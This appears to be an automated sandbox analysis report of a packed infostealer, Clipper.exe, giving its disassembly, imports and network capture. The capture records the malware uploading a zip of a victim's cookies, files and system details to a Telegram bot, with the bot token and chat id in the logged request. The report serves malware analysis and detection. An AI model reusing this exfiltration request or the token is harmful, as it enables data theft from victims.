                      Import Hash:e8effc9201cf1e60acc68af88aec3bd3

                      Entrypoint Preview

                      Instruction
                      push ebx
                      push esi
                      push edi
                      push ebp
                      dec eax
                      lea esi, dword ptr [FFDD70F5h]
                      dec eax
                      lea edi, dword ptr [esi-0031C000h]
                      dec eax
                      lea eax, dword ptr [edi+0051E7B8h]
                      push dword ptr [eax]
                      mov dword ptr [eax], D25B285Ah
                      push eax
                      push edi
                      xor ebx, ebx
                      xor ecx, ecx
                      dec eax
                      or ebp, FFFFFFFFh
                      call 00007F7A54754D65h
                      add ebx, ebx
                      je 00007F7A54754D14h
                      rep ret
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      rep ret
                      dec eax
                      lea eax, dword ptr [edi+ebp]
                      cmp ecx, 05h
                      mov dl, byte ptr [eax]
                      jbe 00007F7A54754D33h
                      dec eax
                      cmp ebp, FFFFFFFCh
                      jnbe 00007F7A54754D2Dh
                      sub ecx, 04h
                      mov edx, dword ptr [eax]
                      dec eax
                      add eax, 04h
                      sub ecx, 04h
                      mov dword ptr [edi], edx
                      dec eax
                      lea edi, dword ptr [edi+04h]
                      jnc 00007F7A54754D01h
                      add ecx, 04h
                      mov dl, byte ptr [eax]
                      je 00007F7A54754D22h
                      dec eax
                      inc eax
                      mov byte ptr [edi], dl
                      sub ecx, 01h
                      mov dl, byte ptr [eax]
                      dec eax
                      lea edi, dword ptr [edi+01h]
                      jne 00007F7A54754D02h
                      rep ret
                      cld
                      inc ecx
                      pop ebx
                      jmp 00007F7A54754D1Ah
                      dec eax
                      inc esi
                      mov byte ptr [edi], dl
                      dec eax
                      inc edi
                      mov dl, byte ptr [esi]
                      add ebx, ebx
                      jne 00007F7A54754D1Ch
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      jc 00007F7A54754CF8h
                      lea eax, dword ptr [ecx+01h]
                      jmp 00007F7A54754D19h
                      dec eax
                      inc ecx
                      call ebx
                      adc eax, eax
                      inc ecx
                      call ebx
                      adc eax, eax
                      add ebx, ebx
                      jne 00007F7A54754D1Ch
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      jnc 00007F7A54754CF6h
                      sub eax, 03h
                      jc 00007F7A54754D2Bh
                      shl eax, 08h

                      Rich Headers

                      Programming Language:
                      • [IMP] VS2008 SP1 build 30729

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5470000x5b4UPX2
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5200000x14850UPX1
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5475b40x24UPX2
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x5461d00x28UPX1
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5463c00x140UPX1
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      UPX00x10000x31c0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      UPX10x31d0000x22a0000x22960061142e098e553c86dde20169c4077b75unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      UPX20x5470000x10000x60026109ef07c8e9de0ec4d5d7876e18decFalse0.3841145833333333data3.8874308360620655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      advapi32.dllFreeSid
                      api-ms-win-crt-heap-l1-1-0.dllfree
                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                      api-ms-win-crt-math-l1-1-0.dlllog
                      api-ms-win-crt-runtime-l1-1-0.dllexit
                      api-ms-win-crt-stdio-l1-1-0.dll_set_fmode
                      api-ms-win-crt-string-l1-1-0.dllstrlen
                      api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                      api-ms-win-crt-utility-l1-1-0.dllqsort
                      bcrypt.dllBCryptGenRandom
                      crypt32.dllCertOpenStore
                      gdi32.dllDeleteDC
                      KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                      ntdll.dllRtlUnwindEx
                      ole32.dllCoInitializeEx
                      oleaut32.dllVariantClear
                      rstrtmgr.dllRmGetList
                      secur32.dllDecryptMessage
                      user32.dllGetMonitorInfoW
                      ws2_32.dllbind

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jun 1, 2024 18:46:44.528789043 CEST4970480192.168.2.5195.201.57.90
                      Jun 1, 2024 18:46:44.533703089 CEST8049704195.201.57.90192.168.2.5
                      Jun 1, 2024 18:46:44.533787012 CEST4970480192.168.2.5195.201.57.90
                      Jun 1, 2024 18:46:44.534746885 CEST4970480192.168.2.5195.201.57.90
                      Jun 1, 2024 18:46:44.539566040 CEST8049704195.201.57.90192.168.2.5
                      Jun 1, 2024 18:46:45.363785028 CEST8049704195.201.57.90192.168.2.5
                      Jun 1, 2024 18:46:45.364150047 CEST4970480192.168.2.5195.201.57.90
                      Jun 1, 2024 18:46:45.369502068 CEST8049704195.201.57.90192.168.2.5
                      Jun 1, 2024 18:46:45.369734049 CEST4970480192.168.2.5195.201.57.90
                      Jun 1, 2024 18:46:57.318103075 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:57.318145037 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:57.318222046 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:57.322938919 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:57.322949886 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.181014061 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.181245089 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.184504032 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.184509993 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.184739113 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.226293087 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.228346109 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.228406906 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.228534937 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.228564978 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.228671074 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.228734016 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.228813887 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229299068 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229314089 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229341030 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229361057 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229422092 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229434967 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229453087 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229482889 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229537964 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229614973 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229614973 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229629040 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229645967 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229650974 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229669094 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229676962 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229712009 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229717970 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229732990 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229738951 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229928017 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229944944 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229960918 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229967117 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229983091 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.229989052 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.229999065 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230005980 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230016947 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230022907 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230029106 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230032921 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230046034 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230051994 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230062008 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230070114 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230082035 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230088949 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230104923 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230112076 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230125904 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230135918 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230144024 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230149984 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230166912 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230168104 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230175018 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230181932 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230191946 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230197906 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230206013 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230211020 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230226040 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230232000 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230247021 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230257034 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230267048 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230273008 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230289936 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230298042 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230312109 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230321884 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230334997 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230340958 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230353117 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230357885 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230367899 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230372906 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230380058 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230385065 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230398893 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230407000 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230418921 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230427027 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230438948 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230449915 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230463028 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230469942 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230479956 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230484962 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230500937 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230500937 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230511904 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230519056 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230526924 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230532885 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230547905 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230557919 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230570078 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230578899 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230592966 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230602026 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230616093 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230623007 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230633020 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230643988 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230659008 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230669022 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230684042 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230689049 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230701923 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230707884 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230714083 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230719090 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230726004 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230731010 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230745077 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230751038 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230765104 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230772972 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230782986 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230792046 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230806112 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230817080 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230828047 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230833054 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230849028 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230849028 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230860949 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230868101 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230874062 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.230884075 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:58.230889082 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:58.276499987 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.357750893 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.398294926 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:59.398308992 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.400031090 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:59.400043964 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.400186062 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:59.400239944 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.400269032 CEST44349705149.154.167.220192.168.2.5
                      Jun 1, 2024 18:46:59.400289059 CEST49705443192.168.2.5149.154.167.220
                      Jun 1, 2024 18:46:59.400316954 CEST49705443192.168.2.5149.154.167.220

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jun 1, 2024 18:46:44.516002893 CEST5017353192.168.2.51.1.1.1
                      Jun 1, 2024 18:46:44.524559975 CEST53501731.1.1.1192.168.2.5
                      Jun 1, 2024 18:46:57.310457945 CEST5868553192.168.2.51.1.1.1
                      Jun 1, 2024 18:46:57.317370892 CEST53586851.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jun 1, 2024 18:46:44.516002893 CEST192.168.2.51.1.1.10x4a57Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                      Jun 1, 2024 18:46:57.310457945 CEST192.168.2.51.1.1.10xeca3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jun 1, 2024 18:46:44.524559975 CEST1.1.1.1192.168.2.50x4a57No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                      Jun 1, 2024 18:46:57.317370892 CEST1.1.1.1192.168.2.50xeca3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • api.telegram.org
                      • ipwho.is

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704195.201.57.90805444C:\Users\user\Desktop\Clipper.exe
                      TimestampBytes transferredDirectionData
                      Jun 1, 2024 18:46:44.534746885 CEST59OUTGET /?output=json HTTP/1.1
                      accept: */*
                      host: ipwho.is
                      Jun 1, 2024 18:46:45.363785028 CEST941INHTTP/1.1 200 OK
                      Date: Sat, 01 Jun 2024 16:46:45 GMT
                      Content-Type: application/json; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Server: ipwhois
                      Access-Control-Allow-Headers: *
                      X-Robots-Tag: noindex
                      Data Raw: 32 62 64 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 54 58 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 36 36 36 34 32 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 37 39 36 39 38 37 39 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 30 31 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 73 22 [TRUNCATED]
                      Data Ascii: 2bd{"ip":"173.254.250.91","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"QuadraNet, Inc","isp":"Quadranet Enterprises LLC","domain":""},"timezone":{"id":"America\/Chicago","abbr":"CDT","is_dst":true,"offset":-18000,"utc":"-05:00","current_time":"2024-06-01T11:46:45-05:00"}}0


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549705149.154.167.2204435444C:\Users\user\Desktop\Clipper.exe
                      TimestampBytes transferredDirectionData
                      2024-06-01 16:46:58 UTC1187OUTPOST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%209U6K4TPK4%20(1280,%201024)%0AHWID:%208938522624742244%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Clipper.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                      content-type: multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4
                      content-length: 978765
                      accept: */*
                      host: api.telegram.org
                      2024-06-01 16:46:58 UTC15197OUTData Raw: 2d 2d 30 36 65 63 35 66 36 31 31 31 32 63 36 38 30 31 2d 33 34 65 33 39 32 37 33 63 32 37 64 62 61 32 63 2d 38 32 39 37 31 33 64 64 64 62 31 63 61 62 36 34 2d 63 63 38 30 61 38 35 64 39 66 61 64 66 61 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 f9 90 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 f9 90 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08
                      Data Ascii: --06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4Content-Disposition: form-data; name="document"; filename="[US]_173.254.250.91.zip"Content-Type: application/zipPKXAutofill/PKX
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 89 30 48 42 80 6d 00 6c 23 89 fb d9 c6 5c 91 82 30 38 93 fb 49 42 12 b6 21 8d 6d 00 22 02 49 d8 e6 81 6c 93 99 d4 5a 01 c8 4c 00 22 02 80 69 9a e8 a2 00 60 1a 00 b6 b9 9f 24 00 6c 63 1b 00 49 48 e2 7e 32 d8 c6 36 b6 91 44 44 20 09 80 6c 60 9b cc 04 40 12 92 90 c4 03 65 26 ad 35 22 82 52 0a 00 99 49 91 68 ad 61 1b 49 48 e2 7e 11 81 24 6c f3 40 b6 b1 8d 6d 22 82 88 00 60 9a 26 6c 53 4a 41 12 ad 35 02 91 99 d8 46 12 11 01 40 6b 8d 6c 8d 52 2b b6 01 90 44 44 00 90 99 d8 26 33 29 a5 10 08 db d8 26 22 90 84 24 32 c1 36 b6 79 20 db d8 a6 d6 8a 6d 6c 23 09 49 00 d8 c6 36 ad 8d 44 81 50 45 61 9c c2 34 c2 01 24 b6 90 0c 04 76 c3 16 76 c3 16 76 43 12 92 90 04 80 24 6c 73 bf 40 00 48 e2 7e b6 b1 0d 40 ad 3d 99 49 44 20 89 71 1c c9 4c 22 02 49 44 04 00 99 09 80 24 24
                      Data Ascii: 0HBml#\08IB!m"IlZL"i`$lcIH~26DD l`@e&5"RIhaIH~$l@m"`&lSJA5F@klR+DD&3)&"$26y ml#I6DPEa4$vvvC$ls@H~@=ID qL"ID$$
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 86 6d 4a 29 44 04 99 89 6d 24 61 9b cc a4 d6 8a 6d 32 13 db 48 22 22 00 c8 4c 32 13 db f4 7d 4f 66 02 20 89 69 9a 88 08 ba 28 64 26 b6 01 b0 8d 6d 00 24 11 11 d8 26 22 00 68 ad 11 11 94 52 c8 4c 5a 8e d8 06 40 12 92 88 08 24 01 30 4d 13 99 09 80 24 24 01 20 09 00 b7 a4 94 82 24 5a 6b 64 26 00 11 81 24 4a 29 64 26 99 09 80 24 6c 63 9b cc 44 fa ee 03 f3 4c b6 f9 f7 fa a4 07 ed f1 a8 8d 89 73 cb e4 8b ff 66 e0 c2 8a cb 5e fd da c2 fb 3e a6 e3 68 6a fc e5 39 f8 e1 a7 4c 1c 4d e6 7e ef fb d8 39 af 7e 53 0f 04 00 d3 38 70 69 f7 02 47 07 fb fc 6b 3d a3 6d f3 9d 87 0f e5 f9 91 c4 03 d9 e6 bf 93 df ec 67 c1 09 18 9c e0 04 12 6c 50 81 b2 c3 c5 67 fc 1a 20 22 84 22 90 82 90 50 04 8a 40 12 a1 80 08 84 50 09 a4 40 0a 50 50 7f f3 63 f9 df e4 da df f8 33 1e e8 e3 df ee
